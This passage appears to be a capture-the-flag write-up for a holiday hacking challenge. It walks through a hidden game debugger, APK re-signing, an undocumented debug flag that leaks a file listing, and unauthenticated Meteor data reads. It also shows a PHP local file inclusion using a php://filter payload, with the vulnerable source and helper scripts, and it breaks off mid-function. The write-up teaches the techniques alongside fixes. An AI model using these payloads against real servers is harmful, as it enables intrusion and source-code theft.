There are our domains. Let's get the IPs so we can check what's in scope, with a quick nslookup:

  • analytics.northpolewonderland.com – 104.198.252.157
  • dungeon.northpolewonderland.com – 35.184.47.139
  • dev.northpolewonderland.com – 35.184.63.245
  • ex.northpolewonderland.com – 104.154.196.33
  • ads.northpolewonderland.com – 104.198.221.240

Tom confirms these are all in scope and suggests that dirbuster is not going to help me.

With the scope confirmed lets spin up a Kali box and get started.

Lets go have a look at the site.

As was suggested, this needs a valid logon. We found one inside the APK earlier; let's try that.

Username = guest, Password = busyreindeer78 and we are logged in successfully. More than that, right at the top of the menu bar is a link to download an MP3. Click the link and we get clip number 2, discombobulatedaudio2.mp3.

Visiting the dungeon's main page is not as revealing as the last pages were.

It looks like a game and an elf in the game will trade for secrets! Looks like we need to beat the game and talk to the elf. But where is the game?

Let's spin up nmap and see what else is on this host. We run a service-version scan against the standard TCP ports (the output below includes version detection and default script results).

. . .  Snip . . . 
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 4e:cd:15:a7:44:ed:87:d5:41:81:c2:0e:78:db:c0:d0 (DSA)
|   2048 5b:14:72:d1:17:a2:3f:98:fb:fe:6c:7d:29:49:19:a2 (RSA)
|_  256 6a:8d:56:49:a3:f5:8c:fd:14:42:a7:c0:4e:ef:a8:64 (ECDSA)
80/tcp    open  http    nginx 1.6.2
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.6.2
|_http-title: About Dungeon
11111/tcp open  vce?
. . . Snip . . .

An open port on 11111 and my spidey sense is tingling. Let's point netcat at that port and see what we get.

[email protected]:~# nc dungeon.northpolewonderland.com 11111
Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>

Fun, an old-school text adventure. Unlike the wumpus I don't think we can bypass this with command line options, and trying basic shell escapes doesn't reveal any obvious flaws either.

>! /bin/bash
An interesting idea, but...
Not a prayer.
>

Pepper Minstix, an elf in the North Pole, also gave us a link to an old version of the dungeon game: http://www.northpolewonderland.com/dungeon.zip. It is probably easier to test against this local copy than against the online version for now.

With the game downloaded there are two files, dungeon and dtextc.dat. Running the dungeon binary gives the same output as the netcat connection, so we are in the right place. Let's start simple with strings.

There are some interesting strings in there but nothing that looks like what we are looking for. From these strings we can identify the game as Zork, or at least a derivative of it, and this game is not small: the map shows many rooms and many challenges before reaching the end. Looks like I'm going to have to cheat.

There are some interesting commands in the binary that are not mentioned in the online help. Let's see if we can get to some of these.

Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take
No robber.
No troll.
No cyclops.
No deaths.
Restored robber.
Restored troll.
Restored cyclops.
Restored deaths.
Taken.

After playing around in the game for a while trying a few things, I decided to take a more systematic approach and use ltrace to see what is happening as the game is played.

[email protected]:~/Desktop/dungeon# ltrace ./dungeon
__libc_start_main(0x4060a3, 1, 0x7fff14c5c378, 0x419570 <unfinished ...>
getenv("TERM")                                   = "xterm-256color"
tgetent(0x7fff14c5b9f0, 0x7fff14c5edbf, 0x7fff14c5edbf, 12) = 1
tgetnum(0x41e088, 42, 0, 0)                      = 24
getuid()                                         = 0
fopen("dtextc.dat", "r")                         = 0x19e62c0
_IO_getc(0x19e62c0)                              = '\0'
_IO_getc(0x19e62c0)                              = '\002'
_IO_getc(0x19e62c0)                              = '\0'
_IO_getc(0x19e62c0)                              = '\a'
_IO_getc(0x19e62c0)                              = '\0'
_IO_getc(0x19e62c0)                              = 'H'
_IO_getc(0x19e62c0)                              = '\002'
_IO_getc(0x19e62c0)                              = 'I'

. . . 

_IO_getc(0x19e62c0)                              = '^'
_IO_getc(0x19e62c0)                              = '\332'
_IO_getc(0x19e62c0)                              = 'S'
_IO_getc(0x19e62c0)                              = '\332'
_IO_getc(0x19e62c0)                              = 'F'
_IO_getc(0x19e62c0)                              = '\332'
_IO_getc(0x19e62c0)                              = 'A'
ftell(0x19e62c0, 65, 0xffffffff, 0x7f7a5e7465c0) = 9063
time(0x7fff14c5c1f0)                             = 1481834271
localtime(0x7fff14c5c1f0)                        = 0x7f7a5ea084a0
chroot(0x41a524, 0, 51, 2016)                    = -1
perror("chroot"chroot: No such file or directory
)                                 = <void>
setuid(1000)                                     = 0
setgid(1000)                                     = -1
fseek(0x19e62c0, 9063, 0, 9063)                  = 0
_IO_getc(0x19e62c0)                              = '\036'
putchar(87, 30, 73, 8192)                        = 87
_IO_getc(0x19e62c0)                              = '\005'
putchar(101, 5, 97, 512)                         = 101
_IO_getc(0x19e62c0)                              = '\0'
putchar(108, 0, 110, 0xfbad2a84)                 = 108
_IO_getc(0x19e62c0)                              = ','


. . . 

_IO_getc(0x19e62c0)                              = '}'
putchar(45, 125, 97, 0xfbad2a84)                 = 45
_IO_getc(0x19e62c0)                              = 'k'
putchar(55, 107, 110, 0xfbad2a84)                = 55
_IO_getc(0x19e62c0)                              = 'G'
putchar(56, 71, 76, 0xfbad2a84)                  = 56
_IO_getc(0x19e62c0)                              = '{'
putchar(46, 123, 97, 0xfbad2a84)                 = 46
_IO_getc(0x19e62c0)                              = '['
putchar(10, 91, 110, 0xfbad2a84Welcome to Dungeon.			This version created 11-MAR-78.
)                 = 10
fseek(0x19e62c0, 0x15237, 0, 0x15237)            = 0
_IO_getc(0x19e62c0)                              = '\300'
putchar(89, 192, 73, 0x15000)                    = 89
_IO_getc(0x19e62c0)                              = '\337'
putchar(111, 223, 97, 0xfbad2a84)                = 111


. . . 

Lots more seeking and putting to screen
. . . 

_IO_getc(0x1da82c0)                              = '\226'
putchar(101, 150, 121, 0xfbad2a84)               = 101
_IO_getc(0x1da82c0)                              = '\225'
putchar(114, 149, 108, 0xfbad2a84)               = 114
_IO_getc(0x1da82c0)                              = '\206'
putchar(101, 134, 111, 0xfbad2a84)               = 101
_IO_getc(0x1da82c0)                              = '\321'
putchar(46, 209, 114, 0xfbad2a84)                = 46
_IO_getc(0x1da82c0)                              = '\304'
putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here.
)                 = 10
putchar(62, 1, 0xe420, 1)                        = 62
fflush(0x7f1c38178600>)                           = 0
fgets(

Watching the dungeon binary run: it opens the .dat file and reads in all the characters, then tries to chroot, which fails with "No such file or directory" and is simply ignored. It then drops privileges with setuid(1000), but because it calls setuid before setgid the setgid call fails and the process keeps its original group. After that it seeks around the .dat file and puts characters on to the screen as text, and pauses at the end waiting for our input.

I try a simple command, 'look'.

putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here.
)                 = 10
putchar(62, 1, 0xe420, 1)                        = 62
fflush(0x7f1c38178600>)                           = 0
fgets(look
"look\n", 78, 0x7f1c381778c0)              = 0x625a84
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('l')                                     = 'L'
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('o')                                     = 'O'
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('o')                                     = 'O'
__ctype_b_loc()                                  = 0x7f1c385a76b0
toupper('k')                                     = 'K'
strcmp("LOOK", "GDT")                            = 5
rand(6, 0, 0, 0)                                 = 0x6b8b4567
fseek(0x1da82c0, 0x15237, 0, 0x15237)            = 0
_IO_getc(0x1da82c0)                              = '\300'
putchar(89, 192, 73, 0x15000)                    = 89

Now that's interesting: it takes my input, converts it to uppercase and compares it against the string "GDT" before processing my action. Let's see what happens if I give it GDT. I'm running this without ltrace for readability.

[email protected]:~/Desktop/dungeon# ./dungeon 
chroot: No such file or directory
Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>GDT
GDT>help
Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take
GDT>

A hidden set of debugger options. After playing around with some of the commands it is apparent I don't know enough about the game or its architecture to cheat effectively; however, I can display the text that is used in the game.

GDT>dt
Entry:    1
Welcome to Dungeon.			This version created 11-MAR-78.
GDT>dt
Entry:    2
Done.
GDT>dt
Entry:    3
Revision history:
11-NOV-16	Converted to HHC (V2.7HHC)
11-MAR-91	Converted to C (V2.7)
14-SEP-87	Converted to f77/Unix for pdps and Vaxen (V2.6B)
18-JUL-80	Transportable data base file (V2.5A).
28-FEB-80	Compressed text file (V2.4A).
15-NOV-79	Bug fixes (V2.3A).
18-JAN-79	Revised DECUS version (V2.2A).
10-OCT-78	Puzzle Room (V2.1A).
10-SEP-78	Endgame (V2.0A).
10-AUG-78	DECUS version (V1.1B).
14-JUN-78	Public version with parser (V1.1A).
4-MAR-78	Debugging version (V1.0A).
GDT>

But only one entry at a time. Time to script something that will read out all the entries for me. I have been playing with pexpect a lot lately, a Python library that can drive interactive command line tools.

import sys
import pexpect

# Run the local binary by default; pass "nc dungeon.northpolewonderland.com 11111"
# as the first argument to dump the online version instead.
run_cmd = sys.argv[1] if len(sys.argv) > 1 else "./dungeon"

# Start the process and wait for the game's ">" prompt
c = pexpect.spawn(run_cmd, encoding="utf-8", timeout=10)
c.expect(">")

# Enter the hidden debugger
c.sendline("GDT")

# Wait for the prompt to change to "GDT>"
c.expect("GDT>", timeout=60)

# Main loop: send "DT", wait for "Entry:", then send the next number
for i in range(1, 2000):
    c.sendline("DT")
    c.expect("Entry:")
    c.sendline(str(i))
    try:
        c.expect("GDT>")
    except (pexpect.EOF, pexpect.TIMEOUT):
        # The game stops answering once we run off the end of the text table
        break
    # Print everything the game said before the next prompt
    print(c.before)

What follows is a scrolling wall of text that prints out all the entries. At some point it starts printing blank lines and then random data; this is caused by trying to read entries that don't exist. We can just stop the output there and read back to find what we want.

    1022
The thief, who is essentially a pragmatist, dispatches you as a threat
to his livelihood.

    1023
The elf, willing to bargain, says "What's in it for me?"

    1024
The elf, satisified with the trade says - 
Try the online version for the true prize

    1025
"That wasn't quite what I had in mind", he says, tossing
the # into the fire, where it vanishes.

    1026
The elf appears increasingly impatient.

    1027
The elf says - you have conquered this challenge - the game will now end.

It worked, we can see what the elf is programmed to say, so now it is just a matter of running the script against the online version. We can do this by changing run_cmd to:

nc dungeon.northpolewonderland.com 11111

and running the script again. This time we get the answer we are looking for, or at least the way to our answer.

    1022
The thief, who is essentially a pragmatist, dispatches you as a threat
to his livelihood.

    1023
The elf, willing to bargain, says "What's in it for me?"

    1024
The elf, satisified with the trade says - 
send email to "[email protected]" for that which you seek.

    1025
"That wasn't quite what I had in mind", he says, tossing
the # into the fire, where it vanishes.

A few minutes after sending the email we get a reply back.

And our next audio clip. discombobulatedaudio3.mp3

 

There doesn't seem to be a lot going on at dev.northpolewonderland.com: nmap doesn't show much in the way of open ports and the web page is blank. Trying a handful of pages reveals nothing. Let's take a look at the app and see if we can figure out where it is used.

Grep for dev.northpole

[email protected]:~/Sans2016$ grep -r dev.north SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>

grep for debug_data_collection

[email protected]:~/Sans2016$ grep -r debug_data_collection SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
SantaGram_4.2/res/values/public.xml:    <public type="string" name="debug_data_collection_url" id="0x7f07001d" />

grep for 0x7f07001d

[email protected]:~/Sans2016$ grep -r 0x7f07001d SantaGram_4.2
SantaGram_4.2/res/values/public.xml:    <public type="string" name="debug_data_collection_url" id="0x7f07001d" />
SantaGram_4.2/smali/com/northpolewonderland/santagram/EditProfile$1.smali:    const v1, 0x7f07001d

After following the chain from string name to resource id to smali we end up in EditProfile$1.smali, an inner class of the Edit Profile activity. But reading the smali on its own doesn't show much.

We need to launch the app and intercept its traffic to understand what is going on here.

The simplest way is to run the app in an emulator. The two most popular options are the Android Studio emulator and Genymotion.

To install Genymotion follow the official guides for your operating system. Once you have Genymotion installed, open Burp and under Proxy -> Options configure Burp to listen on all interfaces.

Then in the Android VM go to Wi-Fi settings -> Modify Network and fill in the proxy settings for your Burp machine.

Drag the apk in to the window to install it and open it. When you first run it you may notice that the app fails to log on or register accounts; this is because Burp is presenting an untrusted certificate, and you can see the TLS error under the Alerts tab in Burp. To fix this we need to export the certificate from Burp and install it in the Android VM.

Burp:

  • Under Proxy -> Options -> Export CA Certificate -> Export -> Certificate in DER format

Android:

  • Drag the certificate file on to the VM window to copy it on to the device
  • Settings -> Security -> Install from SD card
  • Choose Internal Storage -> Downloads (the SD card view will not see the file)
  • Select the certificate file

With the certificate installed as a user CA we can now intercept HTTPS traffic properly. This works on the older Android images Genymotion offered at the time; on Android 7 and later an app ignores user-added CAs unless its network security config opts in, so there you would patch the app or install the CA as a system certificate.

We see a lot of traffic flowing around, but we are interested in the Edit Profile page, which should somehow lead us to the dev domain.

From here I can change some of my profile settings like Name and Bio. The email address can also be changed if you add the parameter to the request, but there is nothing about a dev subdomain.

Looking back in the apk source for all mentions of debug we find an option to enable or disable debug mode, which is currently set to false.

[email protected]:~/Sans2016$ grep -r debug SantaGram_4.2
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/index.php</string>
SantaGram_4.2/res/values/strings.xml:    <string name="debug_data_enabled">false</string>

Changing the XML file in the apk is not as simple as rezipping it. We need to rebuild and sign the application.

Edit res/values/strings.xml and change debug_data_enabled to true.

Build the APK:

[email protected]:~/Sans2016$ apktool b SantaGram_4.2
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...

To sign the APK we need to generate a key and then sign the APK with it. You may need to install a JDK with 'sudo apt-get install openjdk-9-jdk-headless'.

To generate a key use the keytool application:

[email protected]:~/Sans2016$ keytool -genkey -v -keystore my-release-key.keystore -alias SantaGram -keyalg RSA -keysize 2048 -validity 10000
Enter keystore password:  
Re-enter new password: 
What is your first and last name?
  [Unknown]:  Santa
What is the name of your organizational unit?
  [Unknown]:  Gram
What is the name of your organization?
  [Unknown]:  SantaGram
What is the name of your City or Locality?
  [Unknown]:  NorthPole
What is the name of your State or Province?
  [Unknown]:  North
What is the two-letter country code for this unit?
  [Unknown]:  NP
Is CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP correct?
  [no]:  Yes

Generating 2,048 bit RSA key pair and self-signed certificate (SHA256withRSA) with a validity of 10,000 days
  for: CN=Santa, OU=Gram, O=SantaGram, L=NorthPole, ST=North, C=NP
Enter key password for <SantaGram>
  (RETURN if same as keystore password):  
[Storing my-release-key.keystore]

Then sign it with jarsigner and our new key:

[email protected]:~/Sans2016$ jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.keystore SantaGram_4.2/dist/SantaGram_4.2.apk SantaGram
Enter Passphrase for keystore: 
   adding: META-INF/MANIFEST.MF
   adding: META-INF/SANTAGRA.SF
   adding: META-INF/SANTAGRA.RSA
  signing: AndroidManifest.xml
  signing: assets/tou.html
  signing: classes.dex
  signing: res/anim-v21/design_bottom_sheet_slide_in.xml
. . . SNIP . . . 
  signing: res/raw/discombobulatedaudio1.mp3
  signing: resources.arsc
jar signed.

Warning: 
The signer's certificate is self-signed.
No -tsa or -tsacert is provided and this jar is not timestamped. Without a timestamp, users may not be able to validate this jar after the signer certificate's expiration date (2044-05-10) or after any future revocation date.

If all goes well you should be able to drag the new apk from SantaGram_4.2/dist/ into the VM (uninstall the original first, since the re-signed package no longer matches the original signature and Android will refuse to install it as an update) and repeat the steps above to see the traffic to dev.northpolewonderland.com when opening the Edit Profile page.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

Great, now we know how to format the data we can start to play and see what we can get. From this point Burp is a bit heavy; Chrome has a nice extension called Postman which is designed to quickly build and view requests like this.

Sending the JSON string we get a response that echoes our request and gives us a filename.

{"date":"20161223112641","status":"OK","filename":"debug-20161223112641-0.txt","request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":false}}

We can check whether this file exists at https://dev.northpolewonderland.com/debug-20161223112641-0.txt. It does, and it shows us the JSON object we sent.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504}

After playing with a few POSTs and comparing the outputs we can see that the echoed request in the response has an extra field named "verbose" set to false, even though we never sent it. Let's try setting it to true by adding it to our POST.

{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504, "verbose": true}

And we get back a lot more information.

{"date":"20161223113154","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161223113154-0.txt","filename.len":26,"request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":214626504,"verbose":true},"files":["debug-20161223112121-0.txt","debug-20161223112359-0.txt","debug-20161223112506-0.txt","debug-20161223112527-0.txt","debug-20161223112641-0.txt","debug-20161223113154-0.txt","debug-20161224235959-0.mp3","index.php"]}

Which includes an mp3 file: http://dev.northpolewonderland.com/debug-20161224235959-0.mp3
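The comparison step above is the useful part of this technique: diff a normal reply against a tweaked one and look for keys the server adds on its own. Here is an added example (my code, not from the original write-up or the SantaGram app) that builds the debug payload, optionally adds the undocumented "verbose" key, and pulls the leaked listing out of the reply. The two reply constants are constructed copies of the responses shown above so the comparison runs offline; the date format sends a UTC offset where the app sends local time, and whether the server validates that field is not known from the write-up. Only send() touches the network.

```python
import json
import urllib.request
from datetime import datetime, timezone

DEBUG_URL = "http://dev.northpolewonderland.com/index.php"


def debug_payload(udid: str, activity: str, freemem: int, verbose: bool = False) -> dict:
    """Build the JSON the app posts from EditProfile, optionally with the
    undocumented "verbose" key the server echoed back to us."""
    body = {
        # App format is YYYYmmddHHMMSS plus offset, e.g. 20161223061246-0500.
        # We send UTC (+0000); assumption: the server does not check the offset.
        "date": datetime.now(timezone.utc).strftime("%Y%m%d%H%M%S%z"),
        "udid": udid,
        "debug": f"com.northpolewonderland.santagram.{activity}, {activity}",
        "freemem": freemem,
    }
    if verbose:
        body["verbose"] = True
    return body


def extra_keys(basic: dict, verbose: dict) -> set:
    """Keys present in the verbose reply that the normal reply lacks. This is
    the diff that revealed the file listing."""
    return set(verbose) - set(basic)


def interesting_files(reply: dict, skip=(".txt", ".php")) -> list:
    """Drop our own debug dumps and the handler itself from the leaked listing."""
    return [name for name in reply.get("files", []) if not name.endswith(skip)]


def send(payload: dict, url: str = DEBUG_URL) -> dict:
    """POST the payload as JSON and decode the reply (network; not used offline)."""
    req = urllib.request.Request(
        url,
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.load(resp)


# Constructed copies of the two replies shown above.
BASIC_REPLY = json.loads(
    '{"date":"20161223112641","status":"OK","filename":"debug-20161223112641-0.txt",'
    '"request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97",'
    '"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",'
    '"freemem":214626504,"verbose":false}}'
)
VERBOSE_REPLY = json.loads(
    '{"date":"20161223113154","date.len":14,"status":"OK","status.len":"2",'
    '"filename":"debug-20161223113154-0.txt","filename.len":26,'
    '"request":{"date":"20161223061246-0500","udid":"68998bb08ff3cd97",'
    '"debug":"com.northpolewonderland.santagram.EditProfile, EditProfile",'
    '"freemem":214626504,"verbose":true},'
    '"files":["debug-20161223112121-0.txt","debug-20161223112359-0.txt",'
    '"debug-20161223112506-0.txt","debug-20161223112527-0.txt",'
    '"debug-20161223112641-0.txt","debug-20161223113154-0.txt",'
    '"debug-20161224235959-0.mp3","index.php"]}'
)

if __name__ == "__main__":
    print("keys unlocked by verbose:", sorted(extra_keys(BASIC_REPLY, VERBOSE_REPLY)))
    print("files worth a look:", interesting_files(VERBOSE_REPLY))
```

Against a live host you would call send(debug_payload(udid, "EditProfile", freemem)) and send(debug_payload(..., verbose=True)) and pass the two replies to extra_keys(); the lesson for the server side is that a debug flag which changes the response shape must never be accepted from the client.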

Looking at the source of ads.northpolewonderland.com (after whitelisting the domain in your ad blocker, since the hostname trips most block lists) we can see an interesting JavaScript tag:

__meteor_runtime_config__ = JSON.parse(decodeURIComponent("%7B%22meteorRelease%22%3A%22METEOR%401.4.2.3%22%2C%22meteorEnv%22%3A%7B%22NODE_ENV%22%3A%22production%22%2C%22TEST_METADATA%22%3A%22%7B%7D%22%7D%2C%22PUBLIC_SETTINGS%22%3A%7B%7D%2C%22ROOT_URL%22%3A%22http%3A%2F%2Fads.northpolewonderland.com%22%2C%22ROOT_URL_PATH_PREFIX%22%3A%22%22%2C%22appId%22%3A%221vgh1e61x7h692h4hyt1%22%2C%22autoupdateVersion%22%3A%22537dcf6b4594db16ea2d99d0a920f2deeb7dc9f1%22%2C%22autoupdateVersionRefreshable%22%3A%2205c3f7dba9f3e15efa3d971acf18cab901dc0505%22%2C%22autoupdateVersionCordova%22%3A%22none%22%7D"));

Pepper Minstix, an elf in the North Pole, told us about MeteorMiner, a script for enumerating sites built on the Meteor framework.

Seems simple enough: install the TamperMonkey extension in your browser of choice, then install the MeteorMiner script. The next time we load the ads page we should see the MeteorMiner interface.

As we navigate around the pages (routes) by clicking on the grey > we can see the database collections the server publishes for each page, even though we are not logged in.

Looking at the admin/quotes route we can see a HomeQuotes collection that contains an audio record.

MeteorMiner shows us a lot, but we need to use the JavaScript console to view the collection contents.

In Chrome Ctrl + Shift + I opens the console. From here we can use the Meteor client library itself to query the data that has already been published to the browser by typing HomeQuotes.find().fetch(). The underlying flaw is that the server publishes this collection to every client without checking who is logged in; the publication should filter on this.userId before returning records.

Another MP3 for our trouble.

http://ads.northpolewonderland.com/ofdAR4UYRaeNxMg/discombobulatedaudio5.mp3

 

This one is similar in principle to the debug server in terms of approach. From the XML file we recovered from the apk we know there is a PHP page named exception.php, and when we load it in a browser we are told the request method must be POST. Back to Postman.

Create a POST to http://ex.northpolewonderland.com/exception.php and send it:

Content type must be: application/json

OK, set a Content-Type header of application/json and send again:

POST contains invalid JSON!

Fair enough, let's add an empty JSON object in the body and send again:

Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.

OK, let's do as it says: {"operation":"WriteCrashDump"}

Fatal error! JSON key 'data' must be set.

Keep doing as it says: {"operation":"WriteCrashDump", "data":"merryxmas"}

{
"success" : true,
"folder" : "docs",
"crashdump" : "crashdump-AMnahP.php"
}

That looks better. Let's see what's on this page: it seems to have printed out whatever I put in the data field. From here I kind of tunnel visioned for a bit, believing there was a way to use this to execute code on the box.

We had another option for the operation at the beginning, ReadCrashDump. Let's see what this one does.

{"operation":"ReadCrashDump", "data":"merryxmas"}

Fatal error! JSON key 'crashdump' must be set.

OK, let's set that key, assuming crashdump should reference an existing crashdump to read: {"operation":"ReadCrashDump", "data":"merryxmas", "crashdump":"crashdump-AMnahP.php"}

Fatal error! JSON key 'crashdump' must be set.

Let's try putting crashdump inside data instead: {"operation":"ReadCrashDump", "data":{"crashdump":"crashdump-AMnahP.php"}}

Fatal error! crashdump value duplicate '.php' extension detected.

and remove the extension: {"operation":"ReadCrashDump", "data":{"crashdump":"crashdump-AMnahP"}}

"merryxmas"

Great, we were able to read back the contents of the file from our original POST. I started going after some standard files like passwd, shadow etc. and was getting nothing. I was trying to read the source for the exception.php page when I remembered something I saw in the North Pole: Sugarplum Mary was talking about PHP filters and local file inclusion attacks, and she links to a blog post that is probably going to help us.

Let's try reading exception.php again, remembering that the server appends the .php extension for us. This is our new request:

{"operation":"ReadCrashDump", "data":{"crashdump": "php://filter/convert.base64-encode/resource=exception"}}

Success, we are greeted with a chunk of base64 that decodes to the source code for exception.php. It also explains the earlier failures: readCrashdump() appends .php to whatever we supply and passes it to require(), so /etc/passwd becomes /etc/passwd.php and fails, while the php://filter wrapper passes the "last extension is not php" check and makes require() return the target's base64-encoded source instead of executing it.

<?php 

# Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

# Code from http://thisinterestsme.com/receiving-json-post-data-via-php/
# Make sure that it is a POST request.
if(strcasecmp($_SERVER['REQUEST_METHOD'], 'POST') != 0){
    die("Request method must be POST\n");
}
   
# Make sure that the content type of the POST request has been set to application/json
$contentType = isset($_SERVER["CONTENT_TYPE"]) ? trim($_SERVER["CONTENT_TYPE"]) : '';
if(strcasecmp($contentType, 'application/json') != 0){
    die("Content type must be: application/json\n");
}
  
# Grab the raw POST. Necessary for JSON in particular.
$content = file_get_contents("php://input");
$obj = json_decode($content, true);
  # If json_decode failed, the JSON is invalid.
if(!is_array($obj)){
    die("POST contains invalid JSON!\n");
}

# Process the JSON.
if ( ! isset( $obj['operation']) or (
  $obj['operation'] !== "WriteCrashDump" and
  $obj['operation'] !== "ReadCrashDump"))
  {
  die("Fatal error! JSON key 'operation' must be set to WriteCrashDump or ReadCrashDump.\n");
}
if ( isset($obj['data'])) {
  if ($obj['operation'] === "WriteCrashDump") {
    # Write a new crash dump to disk
    processCrashDump($obj['data']);
  }
  elseif ($obj['operation'] === "ReadCrashDump") {
    # Read a crash dump back from disk
    readCrashdump($obj['data']);
  }
}
else {
  # data key unset
  die("Fatal error! JSON key 'data' must be set.\n");
}
function processCrashdump($crashdump) {
  $basepath = "/var/www/html/docs/";
  $outputfilename = tempnam($basepath, "crashdump-");
  unlink($outputfilename);
  
  $outputfilename = $outputfilename . ".php";
  $basename = basename($outputfilename);
  
  $crashdump_encoded = "<?php print('" . json_encode($crashdump, JSON_PRETTY_PRINT) . "');";
  file_put_contents($outputfilename, $crashdump_encoded);
      
  print <<<END
{
  "success" : true,
  "folder" : "docs",
  "crashdump" : "$basename"
}

END;
}
function readCrashdump($requestedCrashdump) {
  $basepath = "/var/www/html/docs/";
  chdir($basepath);		
  
  if ( ! isset($requestedCrashdump['crashdump'])) {
    die("Fatal error! JSON key 'crashdump' must be set.\n");
  }

  if ( substr(strrchr($requestedCrashdump['crashdump'], "."), 1) === "php" ) {
    die("Fatal error! crashdump value duplicate '.php' extension detected.\n");
  }
  else {
    require($requestedCrashdump['crashdump'] . '.php');
  }	
}

?>

And right at the top of the page, a comment with a link to our next mp3:

http://ex.northpolewonderland.com/discombobulated-audio-6-XyzE3N9YqKNH.mp3
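To make the bypass concrete, here is an added example (my code, not part of the original write-up or the challenge) that models the readCrashdump() extension check from the source above in Python, puts a hardened version beside it, and wraps the ReadCrashDump exchange in a small client. The SAFE_NAME pattern is an assumption based on the crashdump-AMnahP name the server returned (tempnam() adds six characters), and fetch_source() is the only function that touches the network.

```python
import base64
import json
import posixpath
import re
import urllib.request
from typing import Optional

EXCEPTION_URL = "http://ex.northpolewonderland.com/exception.php"


def vulnerable_extension_check(name: str) -> bool:
    """Mirror of exception.php: substr(strrchr($name, "."), 1) === "php" is the
    only rejection. Just the text after the LAST dot is inspected, so a name
    with no dot, or whose last dot is followed by anything but 'php', passes.
    Returns True when the server would go on to require($name . '.php')."""
    dot = name.rfind(".")
    ext = "" if dot == -1 else name[dot + 1:]
    return ext != "php"


def filter_wrapper(target: str) -> str:
    """A crashdump value that passes the check but makes require() emit the
    base64 of <target>.php instead of executing it."""
    return f"php://filter/convert.base64-encode/resource={target}"


# Hardened replacement: allow-list the exact shape tempnam() produces (assumed
# from the observed crashdump-AMnahP) and confirm the final path still sits in
# the docs directory before touching the filesystem.
BASEPATH = "/var/www/html/docs/"
SAFE_NAME = re.compile(r"crashdump-[A-Za-z0-9]{6}")


def hardened_path(name: str) -> Optional[str]:
    """Return the path to include, or None if the name is not a plain dump name."""
    if not SAFE_NAME.fullmatch(name):
        return None
    path = posixpath.normpath(posixpath.join(BASEPATH, name + ".php"))
    if posixpath.dirname(path) != posixpath.normpath(BASEPATH):
        return None
    return path


def crashdump_request(operation: str, data) -> bytes:
    """Body for exception.php: {"operation": ..., "data": ...}."""
    return json.dumps({"operation": operation, "data": data}).encode()


def audio_comment(source: str) -> Optional[str]:
    """Pull the file name out of the '# Audio file ...: name.mp3' comment."""
    m = re.search(r"#\s*Audio file[^:\n]*:\s*(\S+\.mp3)", source)
    return m.group(1) if m else None


def fetch_source(target: str = "exception", url: str = EXCEPTION_URL) -> str:
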